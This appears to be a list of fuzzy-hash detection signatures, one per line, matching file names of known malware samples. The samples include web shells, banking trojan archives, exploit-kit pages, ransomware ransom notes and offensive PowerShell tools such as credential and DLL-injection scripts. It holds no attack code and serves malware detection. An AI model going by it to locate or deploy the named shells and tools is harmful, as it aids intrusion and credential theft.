+24:1ZQzmX4bfn3+S2z0pO1gT58tAy6ih+Upy:jGmX4GsbQ+6y,"mod_suphp.shell.htaccess"
+24:1znYbytsoSKy6QincorZreOdWAu21nOeMKsv6McN55zhBM:5Wytty6QNOdX1nYZ+Fh6,"http.py"
+24:1vpVeCcDa3fpr72e7pnWA96J8G3TBVvTBAAfoNCfuwlW7+egMNnfA1Aeb2OYgJfE:dpnRfAypfTMBVK82+laYRg88AmN6mpF,"base_test.py"
+24:1SWWXsTj7CJj9/FAHL6KWThcHTUW1Tv14DAHtwNQQa2RVUd9+irg+:gjXsTj7CJ9++K2cr/sAHtwN+2RVkg+,"cmd.jsp"
+24:1SWWXsTj7CJj9/FAHL6KWThcHTUW1Tv14DAHtwNQ6a2RVUd9+irg+:gjXsTj7CJ9++K2cr/sAHtwNw2RVkg+,"Laudanum JSP Shell.jsp"
+24:1RuZMCciIpKO6LARNOY2uQEvEtUB9/OQOlzrVbfpr72e7pnWAj6J8GxcLw:AKpKO6iYyEtq9/OQOfbfAypfl1c,"test_generators.py"
+24:1RnVZz5TuNlJnOHKJqT0BvpZMN65MBD9nNpQ:rV+Vhv/MN+MdTi,"test_system_info.py"
+24:1RnVZauNcXnOHK3Co5sxSbPacVvZytcV4:rVs3X7LaEvItE4,"test_shell_php.py"
+24:1rbBOo2jpAhaUI/oKI2pfFUBwZu9Na1o2+mGIAeQxNKoer79fpxU7jcAoi:dLcAvIwg9Y6o2+mGIALPKoe9L6jcAoi,"modules.py"
+24:1lFTYw+QtTWH+cmOn3F59G+Cp6rBMf2XzDM4vxolKss4KpfFaKRZIoTDjDjIOkY:7gsg1rzDNG5s4EkKrIWjDjfj,"JSP_KIT_file_view_by_unknkown.jsp.txt"
+24:1ijR754oJpcz01LK8byvEqonCfshmYRnr5ESHPZDOEI1iueJj176KhxLWXJhi:AVqQJ1nCkhhpdHPZDOxjeJj176kW5hi,"code.py"
+24:1ENDZVnhKhxH4P8vFKx3VbPxx7CGd4FoBkHn5Kkq9n7J:iNLhKhxH4eIzt0oBEW9nd,"gzip.py"
+24:1ENDkeH9zKhxH4P8KFh3VbPxx7CGd4FoBkHn5Uq9n7J:iNjlKhxH45bzt0oBEz9nd,"bzip2.py"
+24:1ENDaoBUCKhxH4P8MF/lxAiKFbRbLbVbPxxs5oBkHn5/lkq9n7J:iN3uCKhxH4zNnAiK5VG5oBERr9nd,"zip.py"
+24:1EJDRVzKCgxHwDuy+p44PnATgXTtEA32XIIBwJhAhKXIhAb:iJTzKCgxHwDXW44PMgSAmXfBVAXHb,"linuxprivchecker.py"
+24:1EiODPaFiKhxHdJpcLoBN2w+hOQ3QmCtp+:iiO+FiKhxHCLoBN2wqO8QDC,"ls.py"
+24:1EiOD63EKhxH4Pmbd8sQu/gpPe3brg+8sQu/gpPsR5Oudb25TLoBNnwm59gprTga:iiOCEKhxH4u+sRkGnusRksRAXLoBNT9e,"extensions.py"
+24:1EiFt3DjEKhxH4Pm7tq7CtHDkq7lvrsDkFcJAVeRosFPLoBsvLU9suq9GSQWvP:iijPEKhxH4uwORZQWVe3LoBmB79GEP,"cp.py"
+24:1EiFt3DH/lWFkKCxHovfTYbOOYMLoBNY59m0RRfyb:iijr/lCkKCxHErYbpzLoBNB0RJyb,"mail.py"
+24:1EiFt3DCNTkKhxHBsF3XLoBUmypCZQlqNt86kVw12:iijYTkKhxHMXLoBUfsZQlqNt8nac,"read.py"
+24:1EiFOD64hg11ZKhxp4PmwQodosRoJyi1BVV2msFGIoBFP59NOq9YY:iiI1G1ZKhxp4uwQMmvj2BoBD919J,"webdownload.py"
+24:1E4OqFKCxp4Pmpnd/KYTH0k0mgqe53EbsFGzQ7oBFP59NOq9YY:i1IKCxp4uDHIoJq3ieoBD919J,"clearlog.py"
+24:18p5HDZUdiqZYcFG60NrbeAE/Nm+YOrImEarFcKgQJPhmYTvdKOfu:K51UdvicFdYxP7Uhi2u,"generate.py"
+24:14yuV5gjXzOwFzDYqhSQ0m5YG5sFlrW155dCU+y1jqlbmpZkv144ffnw6DogkRxN:hu0hD7DXMKfrjSm49DfFoLxRS8606C5L,"base_fs.py"
+24:0pf6bLTkSURoMOldtx/40bc7AKPzcBvuv1BjvOQbHK:0x6bL5QoMwdtaMJKPgBmtYuK,"darkBC.py.txt"
+24:0m17APOQKNgH9F4aO1hex6XvYt7E8FM543blwHqgMt3uy/7s6ihcpPgAN21Jmv:0786oaOMEt4qKTt3kNcZgAk1u,"cmdasp.asp"
+24:0m10JhH9F4aO1hex6XvYt7E8FM543blwHqgMt3uy/7s6ihcpPgAN2M:0RhoaOMEt4qKTt3kNcZgAkM,"cmd.txt?"
+24:0jHGM+lZLgzj7c0nRO7JOJc1fpoUeC6zze8P68f68m68n68T68r6868z68+68z6b:00zS/ccRGUlTfaWv4H2cLRwas4F,"2016-05-26-Afraidgate-Angler-EK-CryptXXX-decrypt-instructions.html"
+24:0IcobNY8z8WEKD/ClE89JlZ5boRmuNAbqAzpCKhLJ4ZhLENxY5:0jSBb+79LZB+muNJipNxY5,"asp_kit_file_manager_by_darkraver.asp.txt"
+24:05LXeKGiY5nNxBElpAar3pWE0FRA6YvlhPqh3HGWE0FRA6BC/lhPQCAJ/71bnNLY:k/K+lpAEAfYn1Afs3ID/+Lqst,"50beb18ca26e5e01ab5f70d461b3b5c8_php.txt"
+196608:ssPT9tVvOCrb8NfiGjkKbVprUmm8krPoYtY:ssLTDrbyrkKbVJAUY2,"ZeuS2.0.8.9_Feb2013.zip"
+196608:QGZ5kojJ5GSeJL5lxSJyyw/Jk9UQ94kfDcTd1Yy05peVgjBsiBcVcO:HZ5kojjGnlxSwy2JkqQC9d1psUVgj2cO,"ExploitKit.0x88.zip"
+196608:Cr8Cwi5cQNd+93w1CiniBqaQZMeChJIWpGgzM/qOzZJxK+VeHdhLOkv2+lZTK1Qo:nCLww1CkzZJxidhTBcQEx,"directory-list-lowercase-2.3-big.txt"
+196608:BrUCyij8Hw+KCxB/aVZBezhbIRqvoZ4xg+VehL0ks2g7lwTSV0VzcqE8:iCM0CBoZ4xbaT7cqE8,"directory-list-2.3-big.txt"
+196608:6m9ec6PrH7sf553+soZ/FNhw3/CPtH0BuRu6hU8gA:b9eDrg5dlotFistUBwuiuA,"Neurevt.1.7.0.1.zip"
+196608:0/GvQVmF9s08ItH1ahweOzQqq8iVtPt43oPLJU0C00OFza19n1IIS13dLHSWUd6J:e+HY4tIJf+cVUr00OFe7GZWWUd6BfSa,"Alina.zip"
+192:ZVSQzOHSQ4yioyieuf7cD7QTFjFJB8qnH:45H,"mssql_mysql_2.php"
+192:zvfhJkTLDhEMLeKIrOox66kMhcliwykTnyBwjE:zvfvkHDNIrOB6kQayLBw4,"2016-05-23-CryptXXX_decrypt-instructions.html"
+192:ZStUup+g6QvAz8PmAz8PLAz8P/YA2BHK6Q/m4/YzIZT7yrqG/Zhl8vNctegKciuj:ZX2w8Pmw8PLw8P/YDBHcqM7yrqG/ZhlJ,"Ayyildiz_Tim_AYT_Shell_v 2.1_Biz.txt"
+192:ZStUup+g6QvAz8PmAz8PLAz8P/YA2BHK6Q/m4/YzIZT7yrqG/Zhl8vNctegKciu/:ZX2w8Pmw8PLw8P/YDBHcqM7yrqG/Zhl9,"Shell_by_Ayyildiz_Tim.v2.1.php.txt"
+192:ZRk70Ikml34DQF765jAuarT7a76++gdSVWQ4M4:h+FG5wTuG+FJr,"bt.php.17"
+192:ZPqXCDZB9Pi4k3doiKkHeDWweeuGirV0ZEbzo0IylC5eaKUBHKPURSjV0p:hqSDZLPi4k3LmWwejG1,"invoice_copy_BXyXaD.js"
+192:ZmTcchBEu4uZuXYPZaHQxvk8CPpalB0sEoUH6w70SnPPw7o+OiAS:ZmTJIQxIMKboUH6w70SnPPw7o+OiAS,"00.php"
+192:zmAKa55p5AShmP6sNdu+3K9FMn0wdLS0lFCCVg5:+a55AShmysNX3EFM00LS0WCC5,"2016-06-21-Afraidgate-CryptXXX-decrypt-instructions.html"
+192:ZLqODVsHsyKdhyY7uaTRSFcndShGNcvhBM8:ZDyKnhRHDNSh3,"bt.php.186"
+192:ZlEuEoVIITVsK69vOa6uaAkORdSJJvjJHMo:ZlsK6VU/,"bt.php.53"
+192:ZK6MdSFV4Mgh+lnZgu8z1uaDBwk1ggBaMM:8tO4t4gtBwO3BE,"bt.php.132"
+192:Zj9er16D7kkro3b3xD+kLQXQrEe61DsSBbXbLl/167rCD3kQX252p/rWDd3brE/B:Zj9XD7kkro3b3xD+kLQXQrEe61DsSBbJ,"400.php"
+192:zIs06BXtXeFz0fztuIdwhdUBEUpkhyMfuYcxVKsN25wRnxE17hlnY:zAcph1dwhdUBEKkhyMfuBVKsNEwjE174,"PaymentInformation.html"
+192:ziFdSlKLjz8oHKFLuoi9C4TX2SNMS0GkyoG+ua7zCjzCoqqokoSMbyRwsMo:zi3jvhLtM9GyCHDqqnAe1,"bt.php.188"
+192:ZEVkTrCE8rJJsh/2TPoLLl02gNn7z+1tAhJm0O2xvE6oSMoXizkRtRxH:ZESS3rJ8/2LoqJNn212hJmOxNDFH,"indexer mass dff.cer"
+192:ZEV8h84JP112ZmLLA02gNn7zrptAh7AmfObPOj8WboXizkRtRxf:ZEK64B11xvJNnTp2h7AmYRf,"Indexper-Asp.asp"
+192:ZEV8h84JP112PoLLA02gNn7zrptAh7AmfO3LP28r6boXizkRtRxf:ZEK64B11iovJNnTp2h7AmWBWEf,"Inderxer.asp"
+192:ZEhrDMn5ToE4STBJu0BJQBJ6uauVB8BJnehdSxv9nTG2NCMw:Kh0xJTJSJiJnG25XW,"bt.php.27"
+192:ZdSR/PDLZq+NENOHfLItUimgv9QfnquaVAVUeX9s+MM:bwPDLZq+NENuMq9w1eUeZ,"bt.php.95"
+192:z1xieTn1kfmZpLZp2ZpqZpHKuaRaKdSF6s9QMRZYMc:z1R7pNpopMpGe2,"bt.php.97"
+192:YzuuqCoOGzUNs1bkF029DqV02BoxL4x4/wQhrESSUgt/xW:kqCobUG1bk6tVON4x4/wQGSSUOxW,"bt.php.64"
+192:YYuheXdgBb2/6atuv+odSui9rg/FxJhxrsS2SZSHNSr:ftu2q/i9rg/FNb,"spygrup.php"
+192:yWNVaD6BA2aD/NSWdlaDMnHSEaDV2/2/7azJzQzAzT4bfaDWbWIaDRz0I/jaD+dE:n6KE1cuJupuyiFuM9z6OI,"VirusShare_66a13262da465c26606258176fd3ff5f"
+192:Yu+UftusWIgSJpGN1snkxkkQfwR0BaTPAWdf+YvWSKfXmUVE13bS/U+vi/U++i0:rsSJpfNfw8e44bSMZMk0,"444.php"
+192:Yu66YmPO8nKrJBJ/JUKJBJPaLJMJp2tLyWNbNv5xp5ijeN0JvY+xpIVS7oqeJRWY:YCVK7j21rse0iSEqf5Y6Lbmy6bbTOl+,"2016-07-25-Magnitude-EK-more-html.txt"
+192:yTTnde7OwP+9PmvWGI3VKWEYXnMhopuR3AjE9B:yXpwePmvi3EY8hoAJAjS,"bt.php.36"
+192:+YtbRbFHgm2zpIH3ZU/2V7CkssPOiZzKT7GVmFfcB/x:d5RGIH3cyb2tc1x,"bt.php.123"
+192:yS+xu2/xkmCGU9GzQjoaLc62X6CBcRBfGKKvfPYXePg6F5G:ySmlK0XXBcRFnmHVF5G,"antak.aspx"
+192:yqnFehX5B8lpiSB9xG6oloiAcl5LDzYfLk:MQl4Sl2oiA6nd,"bt.php.112"
+192:YPChpPqr38XmMpqZsNaEoqEjXGxqwefDptqFEVUiJEuMySQwJ:YKhd0Um3AaEiwe9xy,"XXOO.jsp"
+192:YPChp2Ar38XmmpqRsNaEoqEjXRkxqwefD3HqFEVUiJEu0ySQwJ:YKhV4m5AaEiIezLq,"oracle2.jsp"
+192:YiMyEZxuCVy/N8Ng3aHJU+1KWUaD3ajPnFzEPOTy3WfeiH:YVyEm+y/N8ut6Tcl2OoWfD,"sure.php_.txt"
+192:YHzeim2xXn13ccoNbcWUuaqsARdSVmCQMM:AscEbHMATV,"bt.php?.1"
+192:/YEQQYE4hpSuoNdzrSSjOWyzFAaX7VlDyei8gv0FoyfonqJwLNrj56+oos:/YP+mpSuoNk6Bejng8Foyf8q+53a,"JFIF.asp"
+192:ydEUWcg6uVoJK+Clz4aQh6Ipj5Q8GbJH96Vc2Qr3Gn24hP:qlm6qos+0kaOj5Q/f6Vcp6n,"2016-08-05-Cerber-decrypt-instructions.txt"
+192:ydETKJg6uVoJK+1vz4aQh6ypnQQ8GbNH96Vc2Qr3Gn24hP:qLC6qos+FkasnQQ/b6Vcp6n,"2016-07-11-Cerber-decryption-instructions.txt"
+192:ydETKJg6uVoJK+1vz4aQh6dpL9Q8GbXH96Vc2Qr3Gn24hP:qLC6qos+FkaPL9Q/56Vcp6n,"2016-07-25-Cerber-decryption-instructions.txt"
+192:ydE+KJg6uVoJK+1vz4aQh6yRpoQDVQQ8GbJH96Vc2Qr3Gn24hP:qeC6qos+Fka6lCQ/P6Vcp6n,"2016-07-05-Cerber-decryption-instructions.txt"
+192:ydE+KJg6uVoJK+1vz4aQh6KlDpHDQ8GbpH96Vc2Qr3Gn24hP:qeC6qos+FkaAFHDQ/X6Vcp6n,"2016-06-26-Cerber-decryption-instructions.txt"
+192:ydE+KJg6uVoJK+1vz4aQh64pr5Q8GbAH96Vc2Qr3Gn24hP:qeC6qos+FkaGr5Q/K6Vcp6n,"2016-06-25-Cerber-decryption-instructions.txt"
+192:/Y6G672dSA124IrydSFFdSZt4dSZTW9UT9nk9re79/0hb45a8qfFyh2+qZ3nHo8:/YJ67MLErIM3gt6gqmGIAM5LqfF8TqZb,"dedois.jpg?"
+192:y42/dgJHkI6NChGgPbzohlAv2wIWVxpOppVUbLCGhX9dIcem/4sGm:JhhDIQLspV+LCm9ucb/H,"bt.php.215"
+192:y3rslj3iu1Yvuun6hVzGoFWCtIyZIUD2D3NfMfjHP+VuOUGbj+4qZi+0rDWDi4y/:tlj30WuZCL2YL+1+I+Rtsu4Wpds,"NGH.php"
+192:xXe3cGuqBfD/VGZq/D0iPja11dSQvqhPHoSNRO:c3bXDMZq/pjaf4QvARNA,"bt.php.183"
+192:xwBZYa3bDJiYwYyntSvbBf0gty6QvZCCHcdH:+BVcYbyn4tcgty66gH,"config.aar"
+192:XuF2lz/PhTdFNmhjxgN8l0bBwjh3G4YsTDfrdWeOihDX:X42RHhrEhSCl0Eh3zlAiFX,"bt.php.30"
+192:xrS7hk0Q4VHAB6XbvuUSAIX18U77YKx1ysGm:xrtbJEbNSAIXv7UKxf,"bt.php.231"
+192:xRGEe1dYvBTEHFf5TEs9z4M0nTwmert5RgcFdl2vsGm:LG91dwBoHFfyUMMFmm5SOdl2G,"bt.php.214"
+192:XqrWPSouAhADVjs3/cxDHLDUxVShrEMjUCRv9A:EiSouAiB2/cWVwrEMgCRv9A,"stegaref.py"
+192:XPXthj2tPO62iuvP1mLH/dthIjNYPKOPVj95WDmmaa53htxpN+vGhia+4bMhoya:XPXtU9O9iuvPAH/x00tApIY4G,"Invoke-DllInjection.ps1"
+192:XOKr9U46IhglxqQyKVQ6fOiSCy2iSC6iSoCyH:XOKr9U46xlU,"wt.aspx"
+192:Xo6RZpL3DRk6+zgaH5LLzMYXjuUCkg/UC/KX907:S6vaZQ2zCkgMC/KNK,"cpanel (2).txt"
+192:Xmytnbn+ypz2VbU+/7rOiQ4yIkif70FjjFjEjEjjsqkxiQ9mOQ2M60JKTKjTbp4u:XBb+62zjVyGdri6bTKnbW48ZiHE1COuX,"f5505219d6c2c1c8260960a81e48afb8_php.txt"
+192:Xmytnbn+ypz2VbU+/7rOiQ4yIkif70FjjFjEjEjjsqkxiQ9mOQ2M60JKTKjTbp4F:XBb+62zjVyGdri6bTKnbW48ZiHE1COuM,"787588bcf7b852d3950d0e34c055e768_php.txt"
+192:xhqOAEUvzDZB+EVkgQKX5qyK2Ewwe3fpDiUEXtdY6NC6GRuRd0iGsjx3MgZ22M:rqOAfDfLB5qy53fpeTt2YzBRd0ibZ/M,"SimAttacker_Priv8.v1.0.php.txt"
+192:x+fMxFb1By6yPnWg7gmuQYqHKGy5X2ixxKy65HG74t0Xc2Rq8+0c7H:NbL8tMmFYq25X2GIy9G2Rq8+0e,"Domain_Abuse_Report_Viewer.js"
+192:XFj+cuDC9pbH15w3C3gn+W0KIG0JQ4FDLLLLkMhv7MQdsqUDeF5iJo9D9bBCp+Uo:XFjmmPHUS3gnrIGyUM577iqUDeF8Jo9p,"main.inc.php"
+192:xb1gw2EQSUJ30NQUfKpm5jJXYZ4UWtkUfKsn1xmH2nMiJT3MjsGm:xO1EQSUdKQ4Kp0XIbWt0seuPMi,"bt.php.208"
+192:XaE1/OZ9rAi3dDpNBTvQ578ZqceeZqceQZkaqZearD/3Ilk76G7mAaFTC6YTESUi:X5YBBTY5LtuQfskwT2U+vrFAujhFStC,"GsC-Shell-v0.8.0.php"
+192:X9Wif00fx4aDU9cvaIc4x3yMoHXnY74FL1LKnvon/Hqo7pilIVexY:XLcAxXU9cvaIcDI74FL1LKnvon/HFizY,"0b68694c6beaa78983dd30f04925c4e3_php.txt"
+192:X8vL8d08vlzcaelb9pL9s4iNgS9lUL8P9rPkS4ghRJEI0XFLSP9nbzca90AbRF5z:X8vtOac4ghH0XF+FxQ/Og3LbM,"kacak.asp.txt"
+192:x/6s6T6s6G8d8x2QTXjuDqsEvbu8IFvNcmjMZy3B:e862+XjuDqsEvbu8IFvNcmjMZy3B,"yijuhua.jsp"
+192:WycVfSw/XpqX7umhoYEl2jbgm/njsGV2mlsJ3aTmrkEJltDvUtaT2jRb:AVFk6OEMganj398BjZvUt3lb,"foo.php"
+192:WWNVaD6BA2aD/NSWdlaDMnHSEaDV2/2/7azJzQzAzT4bfaDWbWIaDRz0I/jaD+d4:86HE1cuJupuyiFuM9z6OI,"sad.txt.002"
+192:wUYrBEgQugt1Rv/2gptgSCF4iemhwZt4MWRHOE5wbyzvE1EbKUuHFHgXyc:wUYrBAeH5IU0owbWmEb0HFH3c,"AK-74 Security Team Web Shell Beta Version.php"
+192:WTcuDtWogg8Rm2i4o0H49afClChLyITAiVhKgb+DR3j3hR13842m78BYa:QcJoggum2NB6ghLydiEV3j3hR13867Da,"Mysql interface v1.0.jpg"
+192:WSeoKvOSTJrfA9bjAOua4dw3sR5/k+m8IOGXR5PR5eR56fiKwUfBdSJ0TGxYXAXT:WhpOmwSMhrmwaKHfD4,"bt.php.220"
+192:WQXzK+hwEk6dVIk1KO16R6Q3bY4ETjCkgsRh8gjyoLt2rVkLGWqqfxQQn9kwQykz:fAmHQxi6b1,"2016-07-27-Afraidgate-Locky-decrypt-instructions.html"
+192:wqO18bDAjO7+rfaGF8UnjqFuDfx+xM8SDccq8qq0cTH03b2Mcn0M+N6v6bwoxj9e:wqO+bEG+rfa7caMrWiS4v6bwoxRrKspk,"proxy.php"
+192:wqO18b2jO7+rfaGF8UnjqFuDfx+xM8SDccq8qq0cTH03b2Mcn0M+N6v6bwoxj99w:wqO+b2G+rfa7caMrWiS4v6bwoxRrKspk,"proxy.php"
+192:WPuMbFLK8rgRquxqn4qGhS/eu15T+QcoVhDs+By18iq/q0fBDtmSIyntj3:WPtOquxqn4qGhS+Qcofsmy1O/hfBDtmU,"ArgumentsParser.py"
+192:WPFI0rENgSo28gxpxnw6RrNyK3pgVOw9pda6MU:WNI0rz4lxnwyrAK3GVh93am,"bt.php.187"
+192:wNKShccVsgRKj8uk5TuSCbDyM4X8E4Y321pkkI:wNujnYTKCMZE121pnI,"bt.php.40"
+192:WmAnaxZPZoaM6cJ3J4uXLLofhWiWdIRTwzcTF7s:OaxroaM6m3J9LUfhPqIRTjTds,"2016-06-21-pseudoDarkleech-CryptXXX-decrypt-instructions.html"
+192:WkfAJc6cERq29WO6tasbWQafvdw4+f8bT/Jamci1EI+uc/N8Hha:WkfA26cEc4Wms0w4+fUxBcah+dNOa,"bt.php.70"
+192:WjAHIJo6bOESmyZZJJpIrzcc5DSOd3tlRA7J:WQGbiZJJpIrzcc5+OddY,"Controller.py"
+192:WIWCvp2Tm/4SyvuOCL0vgMsOj/HVjJ/sw75Es:H0qauOCIv9L/suh,"bt.php.16"
+192:whmCz67EkBEfDSA6OujJuCui7TspsxG5:l7YrSA6OOYCLApsq,"SSMSPwd-20.exe"
+192:Wg5HqxGlx2QGc3UuyHJ+yNMBzc3m4UAo+jrdFz0+:3pqxGjjGc3UuyHJ5MBz5+jbz0+,"nstview.jpg"
+192:WeMixcZOu/ZpIS1uUAIRNQQjiTNZFx2NRWCZNBLTSNGaM6NMeM8SkY69mZMZiOAn:VxxcZOIpJBAIAWvag621oinn,"Get-GPPPassword.ps1"
+192:/vzrrCWWYpWGL/zOUFVc7C0msucMnxyqbaWk0C:/LfvtpWoKUUm0mkMnfh4,"bt.php.104"
+192:vzk4t3VNHxWk7wfdRToiqXBHXtTDRosSM5ppZZqxzHmjL4+fkr:vVtFNUrRToiEtXxiMjpZZqsjs+2,"bt.php.157"
+192:VWQcWgcclIp2DXyZMDuNLChgu9S9zLH08KoYU+Q:7g9lC27/+LChgbLKox,"ordered_dict.py"
+192:Vuyh+sCugmkZFN8Qc7gZqtwV98qD2H/3ucMZCUTTL9v:VVhbkZ5c7gZE48qD+/+cKCUTT5v,"bt.php.167"
+192:vRowCnAigbXlKvJYVF3+kcAtEsiR4kgPE/kBRXd9JhfzWq7XCnI:GW15qOVtbKFW3Xd9JNnXiI,"gif87a.asp"
+192:vpmqa7dQsCna44/EBFhcJmsTEaLI7TJujJhFgkr4ukQhqX/sTl:RmqwCnahEbhcJxTEgqdu9DgkrWQgX/sB,"proxy.py"
+192:/VP9Et4gG6GuZWO7z4FD27/aU+oTkot9UU72S4aOv6it827XnK:V9EOgGkmAaix4pvd7LK,"sbs.php"
+192:VNlWZv7F3ziOOZk6M1kBDMoZsQbjCErg91fht:VGj3uOOZkL10RnRg91pt,"bt.php.135"
+192:VmAQG95dt4i3KVcWdzuwHE3JmVsMJVyH7h5UZaX:iG9B4i3KiWdbH0JmecVyHrUQX,"2016-07-01-pseudoDarkleech-CryptXXX-decrypt-instructions.html"
+192:Vjvj1lgTKjMdPaYLXoVQXOs+njvj1lg3jhN0QUq1qQ:FcFaeYVls+nwcY,"sosyete.txt.1"
+192:VIeYnmIdSwwAfXYb4ihlVc+xR4GCd0c5uaCD6O+Mg:KHVjfXYb4ih5XO0ce0,"bt.php.87"
+192:vHPBm6BpHtKGlkqkAwjQI+x3niEQDa2DQOYjEa:vHP4sttKdqiK3iE8FLYjEa,"bt.php"
+192:VhmCz6d+kRBEfDFAU2sQCzE4ITsAsjGSje:qdwrFAvCgTAAsf,"SSMSPwd-40.exe"
+192:VgtR/Asxu36dCHusAo6UpvDzo+AQ6ewxIi8rM1Fx:WtOsQLhPprzD76ewOZrqx,"readme.txt"
+192:vdPTg6Bys+fX+K+ucuaECAeRdSt9/Z7MQ:vxVuGtuyAeTe,"bt.php.71"
+192:+vBKI4kGA8bilalGCdG8lplKMc/h6D/KmcDhN+:+0/UYplKM8h6jKmohY,"logon.cpp"
+192:vBG6M46apElV72dyLuU3T0PH9D7kpP6ZtwC55cpeHuz6VjpKvd1QKgD:vBG6M46e472dgzep7kpC35cpKu4jadOF,"TuX_Shadow-shell-v2.0-obf.php"
+192:v9C4XyIAyoGpP5yxMvkRJ3t2tTIqkvMpyabdRIQ:vQiOYSYLP,"Check-VM.ps1"
+192:V0Dvd7JGKeB1gyElPQZ6vqc2SqGNWcEnIKyO0ko:mm5dEtQBcWGNWcEIKD0n,"Antichat-Shell-v1.3.php"
+192:Uv2tChu99F/gTN6TSRiFRuX6Ffupu812YUj2ycfCwuBnY4Q2zkqTrO6QHMhp+rG8:U8Chu90Egi3s0fupwYa2RIdzIxwpE2qj,"2016-06-23-gate-support-a.online-knowledgebase-core-bootstrap.min.js.txt"
+192:UV2Q5TQ5RPIT0tcnNliQvCvT13vxCd1LiGB4K/6hnwa4Gpf+d+PjK4dWG9PtMrbY:Q5hwuNsQvUT1J01OGBgDRf+d+Hlnz,"tool25.php"
+192:U/tuu5Wg9LOhFqmBqJnZ8sRB91TfhzQboFMDM+Bt24C9HTzbw0s8:UuhFq6qJZTl5ym88,"Zetha-Webshell-v0.4.php"
+192:USJf+l+RVdSRMHI7ASp9s0vrdUHo6uasd8WYH7MQ:USh+l+RHhHI7ASpGOJTtYt,"bt.php.15"
+192:uS6dSdWTCbIyrvBB8Be+EFsvougy1YuaIfDf7Ms:uXqwgugyjl,"bt.php.81"
+192:UQMmVgyGKjrD3wTXvyU0k+5jchQJP+IO1EhpI5Zlh/bMp6:/MmVgyj/gXqWqPXeEh2bzN,"bt.php.110"
+192:uPGLpjqZAU3r6Uai6UTFdvM1yQtA4Qrismnu:uPEpqtUi6YdvM1yQFPQ,"cgitelnet.zip"
+192:uNnuShCKDYfSowfp8yJGKTU1NB0BZi0QMc6uSey5BdZI1ct3+xZ1v1krfjry+mkb:dKY1R+kMcFy5Bd3O/P6tue7,"nshell.txt"
+192:un9oweFS6qEdvSEA1HAFgvsVkorMra8lLjbR1r2OOSL9m:YoHFzqEdcQgWzsNhjbRV2Oh9m,"2016-03-24-TeslaCrypt-+REcovER+lwxbh+.html"
+192:uMWEgIaBFvJvnXTayvuygkSkbVNLXodrAiDsdCuUvLn86lNQk:uMWEqTRpPkoYECuUvLn86fb,"9922bbccf2f075f4e6780f6ca8b7b4ff_php.txt"
+192:Ulg/JkVLCwASWvX0Dw+oM+0BwujoftK7CRztU:ULCwASW/0DwdVKOHU,"bt.php.38"
+192:UL2+KGx8152dHAehh8bRGzm67s3FZRRtyv2uRQmU7EdOimXcv8bt/oMo:UL2+9jAKWbRZfRrxEsimXLWR,"_abc.py"
+192:U+iTodSxiZqbxOmUUeVn29IEHncGvLyuawB80GZ8pGxDG9MM:UXTqPqqJ29sGvLJB80GZ8pGlGD,"bt.php.21"
+192:UI2UP0qI6uYc+fR6B2TKXnV4S+t+Ue4FoJUsgiMqD31vpBS4CVpe:EUzcsR69XnV4SWFBssGNXSDe,"foo2.php"
+192:UHjKL8Yqc7KQ81AppUO4L1pc4BpwHppQpNppUY4e9p0pwHVpQpa1yRb91ddqIbpq:O,"2016-05-31-Locky_HELP_instructions.bmp"
+192:UggdShQBHIroSRZTlnRVdtlkd1u11HV+8uaFm1SMk:UTfBHIroSRQqHV+DE,"bt.php.128"
+192:ufBsWGAZvwGxP1hNWwI9V0YOOsFbkRHeZtyIVyX8c727LMoOyXoy7NgvZ4xsnyQH:uZsWGAZvwGxP1hNWwI9V0YO1NkRHezy5,"soak2.php"
+192:uDyk8hr7851M711fSzplJq8QWWLW6N9Nafc+DycfAMDSu:u213UpP6W6N9Nr+PRDSu,"2016-08-03-Magnitude-EK-more-html.txt"
+192:UdSDf4ET/era0LIWIKmruuaJ+CGb2zYy/xGuatjoGm:W89iEuLGifxGuF,"bt.php.227"
+192:UdEUWcg6uVoJK+Clz4aQh6PpLfQ8Gb7H96Vc2Qr3Gn24hP:slm6qos+0kaVLfQ/l6Vcp6n,"2016-08-10-Cerber-decryption-instructions.txt"
+192:ub+s8JExi4Qaq6FDEh/4tdhlpI92CkBONSrLHarLvkq76NX3gas41Ykzj5hoBDes:O+s8JKQc53z8uauWMq76Rlpa2qSl2,"csh.php.php.txt"
+192:Uay8bdzH+9dYo4cjTLErO9u0ETfxJszyRC3n/iZrjsGm:tyGVH+HY4jEr0u/kuRC3qQ,"bt.php.206"
+192:UAqdSltUNt+ekWnvtJ0VXVt6sIMGQ6MWd6Sua96f681MHMY:UNv7PqVXVtSFQN2JKsp,"bt.php.7"
+192:u9frEjArAfsWvy45oTM9V3ts/VtuDSBeT81K4781oXU/y:u9fRsN5ooVC/VcD+wJa,"bt.php.153"
+192:U6dZu8RLQ+mAIb2Q59KGwZi/3x/31jpHbDbqj/hB1mmEzgPaxyRa6y+rahyflKky:U6BQmWrE3r7KXkE5F,"lostDC_by_lostpassword.php.txt"
+192:U38hHE7fI8mcMmSroNsy17xG36vC6IdKTBRhxhxhA:U38hHE7fFmlmhDhxw+C69TfhxhxhA,"hk4wmvwo.5bs.vbs"
+192:U2q33ctEvEu0uaB/fUL+JfL1X+dSJM3oLgyJNuMTMM:Ut33+uuntJ0B3oLgyJNu8,"bt.php.194"
+192:tztBI15aoisBLLfSqQ5T5pAEHFq+JvfapN34d3e+3s73X85qNo/1UecRK2IwAEvi:th615Yslf25T5n1Jvf80cRiajJvfavH,"Mayhem.psm1"
+192:tu0DEMky7ggk44NQmjum4Al4ikzyxjOEDj8QPrz2kZVeLx:tu0i5NvjuNBWiEDYQP35V+,"ea0b0cdb6d705a46a9d3a53b85d7f4ce_php.txt"
+192:TTGJnBCWo7jNhfHSetJTkaGAyaztUSJp347S37ba/LYAt5t:nGaWoHSejl/yS/J147S37ba/F5t,"Invoke-PoshRatHttps.ps1"
+192:T+SohHHrR7HEa+QUiYYVak1D5vrShTnKfCx1r3K:Pcl7X+QUifjFrS5r3K,"2016-08-18-page-from-lamaisondete.com-with-injected-script.txt"
+192:tRJxrqTjjhYAfie2TYKLcyUUTcnkSc+1pKz6jU:tRJdqPj12TYzyU+ochz6I,"2016-05-25-CryptXXX-from-pseudoDarkleech-Angler-EK-decrypt-instructions.html"
+192:tRcM4dZKIB5VPWIE7tUl6JnWZN5eUAYziW5QHU3:teM+gQWX7t8N5eUAYZ2H+,"bbb1.php"
+192:Tr4T0a6q52e/PVBZdVX51I1phDLYEoBTG+Xol9exQlVn6QZjYejS7TAnkJ8OVspU:HZe/PPZde1DDqdhXorVj1usyqhn2Ajk,"cgi.cin"
+192:tN9Xs6sH9UilR8woApSfNH8fUEjrOLVAbussQfkUw4CsSR:D,"eno.txt"
